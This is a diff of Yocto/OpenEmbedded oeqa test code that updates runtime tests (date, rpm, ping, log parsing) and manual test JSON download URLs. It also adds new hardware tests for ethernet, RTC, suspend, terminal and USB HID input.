133 msg = "OETestTimeout didn't restore SIGALRM" 133 msg = "OETestTimeout didn't restore SIGALRM"
134 self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg) 134 self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
135 135
136 def test_timeout_cancel(self):
137 tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
138 msg = 'Unrelated test failed to complete'
139 tc = self._testLoader(modules=self.modules, tests=tests)
140 self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
141
136if __name__ == '__main__': 142if __name__ == '__main__':
137 unittest.main() 143 unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
44 "expected_results": "" 44 "expected_results": ""
45 }, 45 },
46 "2": { 46 "2": {
47 "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n", 47 "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
48 "expected_results": " Qemu can be lauched normally." 48 "expected_results": " Qemu can be lauched normally."
49 }, 49 },
50 "3": { 50 "3": {
@@ -60,7 +60,7 @@
60 "expected_results": "" 60 "expected_results": ""
61 }, 61 },
62 "6": { 62 "6": {
63 "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n", 63 "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
64 "expected_results": "" 64 "expected_results": ""
65 }, 65 },
66 "7": { 66 "7": {
@@ -247,7 +247,7 @@
247 "execution": { 247 "execution": {
248 "1": { 248 "1": {
249 "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n", 249 "action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
250 "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n" 250 "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
251 }, 251 },
252 "2": { 252 "2": {
253 "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n", 253 "action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
136 "expected_results": "" 136 "expected_results": ""
137 }, 137 },
138 "3": { 138 "3": {
139 "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n", 139 "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
140 "expected_results": "" 140 "expected_results": ""
141 }, 141 },
142 "4": { 142 "4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
13 def setUp(self): 13 def setUp(self):
14 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd': 14 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
15 self.logger.debug('Stopping systemd-timesyncd daemon') 15 self.logger.debug('Stopping systemd-timesyncd daemon')
16 self.target.run('systemctl disable --now systemd-timesyncd') 16 self.target.run('systemctl disable --now --runtime systemd-timesyncd')
17 17
18 def tearDown(self): 18 def tearDown(self):
19 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd': 19 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
20 self.logger.debug('Starting systemd-timesyncd daemon') 20 self.logger.debug('Starting systemd-timesyncd daemon')
21 self.target.run('systemctl enable --now systemd-timesyncd') 21 self.target.run('systemctl enable --now --runtime systemd-timesyncd')
22 22
23 @OETestDepends(['ssh.SSHTest.test_ssh']) 23 @OETestDepends(['ssh.SSHTest.test_ssh'])
24 @OEHasPackage(['coreutils', 'busybox']) 24 @OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
28 self.assertEqual(status, 0, msg=msg) 28 self.assertEqual(status, 0, msg=msg)
29 oldDate = output 29 oldDate = output
30 30
31 sampleDate = '"2016-08-09 10:00:00"' 31 sampleTimestamp = 1488800000
32 (status, output) = self.target.run("date -s %s" % sampleDate) 32 (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
33 self.assertEqual(status, 0, msg='Date set failed, output: %s' % output) 33 self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
34 34
35 (status, output) = self.target.run("date -R") 35 (status, output) = self.target.run('date +"%s"')
36 p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
37 msg = 'The date was not set correctly, output: %s' % output 36 msg = 'The date was not set correctly, output: %s' % output
38 self.assertTrue(p, msg=msg) 37 self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
39 38
40 (status, output) = self.target.run('date -s "%s"' % oldDate) 39 (status, output) = self.target.run('date -s "%s"' % oldDate)
41 msg = 'Failed to reset date, output: %s' % output 40 msg = 'Failed to reset date, output: %s' % output
diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfQemu
4
5class Ethernet_Test(OERuntimeTestCase):
6
7 def set_ip(self, x):
8 x = x.split(".")
9 sample_host_address = '150'
10 x[3] = sample_host_address
11 x = '.'.join(x)
12 return x
13
14 @skipIfQemu('qemuall', 'Test only runs on real hardware')
15 @OETestDepends(['ssh.SSHTest.test_ssh'])
16 def test_set_virtual_ip(self):
17 (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
18 self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
19 original_ip = output
20 virtual_ip = self.set_ip(original_ip)
21
22 (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
23 self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
24
25 @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])
26 def test_get_ip_from_dhcp(self):
27 (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
28 self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
29 wired_interfaces = output
30
31 (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
32 self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
33 default_gateway = output
34
35 (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
36 self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output) \ No newline at end of file
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
10from oeqa.core.decorator.data import skipIfNotFeature 10from oeqa.core.decorator.data import skipIfNotFeature
11 11
12# need some kernel fragments 12# need some kernel fragments
13# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf 13# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
14class KSample(OERuntimeTestCase): 14class KSample(OERuntimeTestCase):
15 def cmd_and_check(self, cmd='', match_string=''): 15 def cmd_and_check(self, cmd='', match_string=''):
16 status, output = self.target.run(cmd) 16 status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
67 def runltp(self, ltp_group): 67 def runltp(self, ltp_group):
68 cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group) 68 cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
69 starttime = time.time() 69 starttime = time.time()
70 (status, output) = self.target.run(cmd) 70 (status, output) = self.target.run(cmd, timeout=1200)
71 endtime = time.time() 71 endtime = time.time()
72 72
73 with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f: 73 with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
8from oeqa.runtime.case import OERuntimeTestCase 8from oeqa.runtime.case import OERuntimeTestCase
9from oeqa.core.decorator.depends import OETestDepends 9from oeqa.core.decorator.depends import OETestDepends
10from oeqa.core.decorator.data import skipIfNotFeature 10from oeqa.core.decorator.data import skipIfNotFeature
11from oeqa.runtime.decorator.package import OEHasPackage
11 12
12class PamBasicTest(OERuntimeTestCase): 13class PamBasicTest(OERuntimeTestCase):
13 14
14 @skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES') 15 @skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
15 @OETestDepends(['ssh.SSHTest.test_ssh']) 16 @OETestDepends(['ssh.SSHTest.test_ssh'])
17 @OEHasPackage(['shadow'])
18 @OEHasPackage(['shadow-base'])
16 def test_pam(self): 19 def test_pam(self):
17 status, output = self.target.run('login --help') 20 status, output = self.target.run('login --help')
18 msg = ('login command does not work as expected. ' 21 msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
32 "Failed to load module \"fbdev\"", 32 "Failed to load module \"fbdev\"",
33 "Failed to load module fbdev", 33 "Failed to load module fbdev",
34 "Failed to load module glx", 34 "Failed to load module glx",
35 "[drm] Cannot find any crtc or sizes - going 1024x768", 35 "[drm] Cannot find any crtc or sizes",
36 "_OSC failed (AE_NOT_FOUND); disabling ASPM", 36 "_OSC failed (AE_NOT_FOUND); disabling ASPM",
37 "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)", 37 "Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
38 "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!", 38 "NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
61 "[rdrand]: Initialization Failed", 61 "[rdrand]: Initialization Failed",
62 "[pulseaudio] authkey.c: Failed to open cookie file", 62 "[pulseaudio] authkey.c: Failed to open cookie file",
63 "[pulseaudio] authkey.c: Failed to load authentication key", 63 "[pulseaudio] authkey.c: Failed to load authentication key",
64 "was skipped because of a failed condition check",
65 "was skipped because all trigger condition checks failed",
64 ] 66 ]
65 67
66video_related = [ 68video_related = [
@@ -88,6 +90,9 @@ qemux86_common = [
88 'tsc: HPET/PMTIMER calibration failed', 90 'tsc: HPET/PMTIMER calibration failed',
89 "modeset(0): Failed to initialize the DRI2 extension", 91 "modeset(0): Failed to initialize the DRI2 extension",
90 "glamor initialization failed", 92 "glamor initialization failed",
93 "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
94 "floppy: error",
95 'failed to IDENTIFY (I/O error, err_mask=0x4)',
91] + common_errors 96] + common_errors
92 97
93ignore_errors = { 98ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
293 grepcmd = 'grep ' 298 grepcmd = 'grep '
294 grepcmd += '-Ei "' 299 grepcmd += '-Ei "'
295 for error in errors: 300 for error in errors:
296 grepcmd += '\<' + error + '\>' + '|' 301 grepcmd += r'\<' + error + r'\>' + '|'
297 grepcmd = grepcmd[:-1] 302 grepcmd = grepcmd[:-1]
298 grepcmd += '" ' + str(log) + " | grep -Eiv \'" 303 grepcmd += '" ' + str(log) + " | grep -Eiv \'"
299 304
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
304 errorlist = ignore_errors['default'] 309 errorlist = ignore_errors['default']
305 310
306 for ignore_error in errorlist: 311 for ignore_error in errorlist:
307 ignore_error = ignore_error.replace('(', '\(') 312 ignore_error = ignore_error.replace('(', r'\(')
308 ignore_error = ignore_error.replace(')', '\)') 313 ignore_error = ignore_error.replace(')', r'\)')
309 ignore_error = ignore_error.replace("'", '.') 314 ignore_error = ignore_error.replace("'", '.')
310 ignore_error = ignore_error.replace('?', '\?') 315 ignore_error = ignore_error.replace('?', r'\?')
311 ignore_error = ignore_error.replace('[', '\[') 316 ignore_error = ignore_error.replace('[', r'\[')
312 ignore_error = ignore_error.replace(']', '\]') 317 ignore_error = ignore_error.replace(']', r'\]')
313 ignore_error = ignore_error.replace('*', '\*') 318 ignore_error = ignore_error.replace('*', r'\*')
314 ignore_error = ignore_error.replace('0-9', '[0-9]') 319 ignore_error = ignore_error.replace('0-9', '[0-9]')
315 grepcmd += ignore_error + '|' 320 grepcmd += ignore_error + '|'
316 grepcmd = grepcmd[:-1] 321 grepcmd = grepcmd[:-1]
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
6 6
7from oeqa.runtime.case import OERuntimeTestCase 7from oeqa.runtime.case import OERuntimeTestCase
8from oeqa.core.decorator.oetimeout import OETimeout 8from oeqa.core.decorator.oetimeout import OETimeout
9from oeqa.core.exception import OEQATimeoutError
9 10
10class PingTest(OERuntimeTestCase): 11class PingTest(OERuntimeTestCase):
11 12
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
13 def test_ping(self): 14 def test_ping(self):
14 output = '' 15 output = ''
15 count = 0 16 count = 0
16 while count < 5: 17 try:
17 cmd = 'ping -c 1 %s' % self.target.ip 18 while count < 5:
18 proc = Popen(cmd, shell=True, stdout=PIPE) 19 cmd = 'ping -c 1 %s' % self.target.ip
19 output += proc.communicate()[0].decode('utf-8') 20 proc = Popen(cmd, shell=True, stdout=PIPE)
20 if proc.poll() == 0: 21 output += proc.communicate()[0].decode('utf-8')
21 count += 1 22 if proc.poll() == 0:
22 else: 23 count += 1
23 count = 0 24 else:
25 count = 0
26 except OEQATimeoutError:
27 self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
24 msg = ('Expected 5 consecutive, got %d.\n' 28 msg = ('Expected 5 consecutive, got %d.\n'
25 'ping output is:\n%s' % (count,output)) 29 'ping output is:\n%s' % (count,output))
26 self.assertEqual(count, 5, msg = msg) 30 self.assertEqual(count, 5, msg = msg)
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
49 msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output) 49 msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
50 self.assertEqual(status, 0, msg=msg) 50 self.assertEqual(status, 0, msg=msg)
51 51
52 def check_no_process_for_user(u): 52 def wait_for_no_process_for_user(u, timeout = 120):
53 _, output = self.target.run(self.tc.target_cmds['ps']) 53 timeout_at = time.time() + timeout
54 if u + ' ' in output: 54 while time.time() < timeout_at:
55 return False 55 _, output = self.target.run(self.tc.target_cmds['ps'])
56 else: 56 if u + ' ' not in output:
57 return True 57 return
58 time.sleep(1)
59 user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
60 msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
61 self.fail(msg=msg)
58 62
59 def unset_up_test_user(u): 63 def unset_up_test_user(u):
60 # ensure no test1 process in running 64 # ensure no test1 process in running
61 timeout = time.time() + 30 65 wait_for_no_process_for_user(u)
62 while time.time() < timeout:
63 if check_no_process_for_user(u):
64 break
65 else:
66 time.sleep(1)
67 status, output = self.target.run('userdel -r %s' % u) 66 status, output = self.target.run('userdel -r %s' % u)
68 msg = 'Failed to erase user: %s' % output 67 msg = 'Failed to erase user: %s' % output
69 self.assertTrue(status == 0, msg=msg) 68 self.assertTrue(status == 0, msg=msg)
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
141 140
142 self.tc.target.run('rm -f %s' % self.dst) 141 self.tc.target.run('rm -f %s' % self.dst)
143 142
144 # if using systemd this should ensure all entries are flushed to /var
145 status, output = self.target.run("journalctl --sync")
146 # Get the amount of entries in the log file
147 status, output = self.target.run(check_log_cmd)
148 msg = 'Failed to get the final size of the log file.'
149 self.assertEqual(0, status, msg=msg)
150 143
151 # Check that there's enough of them
152 self.assertGreaterEqual(int(output), 80,
153 'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfFeature
4from oeqa.runtime.decorator.package import OEHasPackage
5
6import re
7
8class RTCTest(OERuntimeTestCase):
9
10 def setUp(self):
11 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
12 self.logger.debug('Stopping systemd-timesyncd daemon')
13 self.target.run('systemctl disable --now --runtime systemd-timesyncd')
14
15 def tearDown(self):
16 if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
17 self.logger.debug('Starting systemd-timesyncd daemon')
18 self.target.run('systemctl enable --now --runtime systemd-timesyncd')
19
20 @skipIfFeature('read-only-rootfs',
21 'Test does not work with read-only-rootfs in IMAGE_FEATURES')
22 @OETestDepends(['ssh.SSHTest.test_ssh'])
23 @OEHasPackage(['coreutils', 'busybox'])
24 def test_rtc(self):
25 (status, output) = self.target.run('hwclock -r')
26 self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
27
28 (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
29 self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
30
31 example_datetime = '062309452008'
32 (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
33 check_hwclock = re.search('2008-06-23 09:45:..', output)
34 self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
35
36 (status, output) = self.target.run('date %s' % current_datetime)
37 self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
38
39 (status, output) = self.target.run('hwclock -w')
40 self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
23 os.remove(cls.tmp_path) 23 os.remove(cls.tmp_path)
24 24
25 @OETestDepends(['ssh.SSHTest.test_ssh']) 25 @OETestDepends(['ssh.SSHTest.test_ssh'])
26 @OEHasPackage(['openssh-scp', 'dropbear']) 26 @OEHasPackage(['openssh-scp'])
27 def test_scp_file(self): 27 def test_scp_file(self):
28 dst = '/tmp/test_scp_file' 28 dst = '/tmp/test_scp_file'
29 29
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfQemu
4import threading
5import time
6
7class Suspend_Test(OERuntimeTestCase):
8
9 def test_date(self):
10 (status, output) = self.target.run('date')
11 self.assertEqual(status, 0, msg = 'Failed to run date command, output : %s' % output)
12
13 def test_ping(self):
14 t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
15 t_thread.start()
16 time.sleep(2)
17
18 status, output = self.target.run('pidof ping')
19 self.target.run('kill -9 %s' % output)
20 self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)
21
22 def set_suspend(self):
23 (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
24 self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
25
26 @skipIfQemu('qemuall', 'Test only runs on real hardware')
27 @OETestDepends(['ssh.SSHTest.test_ssh'])
28 def test_suspend(self):
29 self.test_date()
30 self.test_ping()
31 self.set_suspend()
32 self.test_date()
33 self.test_ping()
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.runtime.decorator.package import OEHasPackage
4
5import threading
6import time
7
8class TerminalTest(OERuntimeTestCase):
9
10 @OEHasPackage(['matchbox-terminal'])
11 @OETestDepends(['ssh.SSHTest.test_ssh'])
12 def test_terminal_running(self):
13 t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
14 t_thread.start()
15 time.sleep(2)
16
17 status, output = self.target.run('pidof matchbox-terminal')
18 number_of_terminal = len(output.split())
19 self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal being launched. Number of terminal launched : %s' % number_of_terminal)
20 self.target.run('kill -9 %s' % output)
21 self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
1from oeqa.runtime.case import OERuntimeTestCase
2from oeqa.core.decorator.depends import OETestDepends
3from oeqa.core.decorator.data import skipIfQemu
4from oeqa.runtime.decorator.package import OEHasPackage
5
6class USB_HID_Test(OERuntimeTestCase):
7
8 def keyboard_mouse_simulation(self):
9 (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
10 return self.assertEqual(status, 0, msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
11
12 def set_suspend(self):
13 (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
14 return self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
15
16 @OEHasPackage(['xdotool'])
17 @skipIfQemu('qemuall', 'Test only runs on real hardware')
18 @OETestDepends(['ssh.SSHTest.test_ssh'])
19 def test_USB_Hid_input(self):
20 self.keyboard_mouse_simulation()
21 self.set_suspend()
22 self.keyboard_mouse_simulation()
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
5# 5#
6 6
7import os 7import os
8import sys
8 9
9from oeqa.core.context import OETestContext, OETestContextExecutor 10from oeqa.core.context import OETestContext, OETestContextExecutor
10from oeqa.core.target.ssh import OESSHTarget 11from oeqa.core.target.ssh import OESSHTarget
@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
66 % self.default_target_type) 67 % self.default_target_type)
67 runtime_group.add_argument('--target-ip', action='store', 68 runtime_group.add_argument('--target-ip', action='store',
68 default=self.default_target_ip, 69 default=self.default_target_ip,
69 help="IP address of device under test, default: %s" \ 70 help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
70 % self.default_target_ip) 71 % self.default_target_ip)
71 runtime_group.add_argument('--server-ip', action='store', 72 runtime_group.add_argument('--server-ip', action='store',
72 default=self.default_target_ip, 73 default=self.default_target_ip,
73 help="IP address of device under test, default: %s" \ 74 help="IP address of the test host from test target machine, default: %s" \
74 % self.default_server_ip) 75 % self.default_server_ip)
75 76
76 runtime_group.add_argument('--host-dumper-dir', action='store', 77 runtime_group.add_argument('--host-dumper-dir', action='store',
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
119 # XXX: Don't base your targets on this code it will be refactored 120 # XXX: Don't base your targets on this code it will be refactored
120 # in the near future. 121 # in the near future.
121 # Custom target module loading 122 # Custom target module loading
122 target_modules_path = kwargs.get('target_modules_path', '') 123 controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
123 controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
124 target = controller(logger, target_ip, server_ip, **kwargs) 124 target = controller(logger, target_ip, server_ip, **kwargs)
125 125
126 return target 126 return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
130 # AttributeError raised if not found. 130 # AttributeError raised if not found.
131 # ImportError raised if a provided module can not be imported. 131 # ImportError raised if a provided module can not be imported.
132 @staticmethod 132 @staticmethod
133 def getControllerModule(target, target_modules_path): 133 def getControllerModule(target):
134 controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path) 134 controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
135 controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist) 135 controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
136 return controller 136 return controller
137 137
138 # Return a list of all python modules in lib/oeqa/controllers for each 138 # Return a list of all python modules in lib/oeqa/controllers for each
139 # layer in bbpath 139 # layer in bbpath
140 @staticmethod 140 @staticmethod
141 def _getControllerModulenames(target_modules_path): 141 def _getControllerModulenames():
142 142
143 controllerslist = [] 143 controllerslist = []
144 144
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
153 else: 153 else:
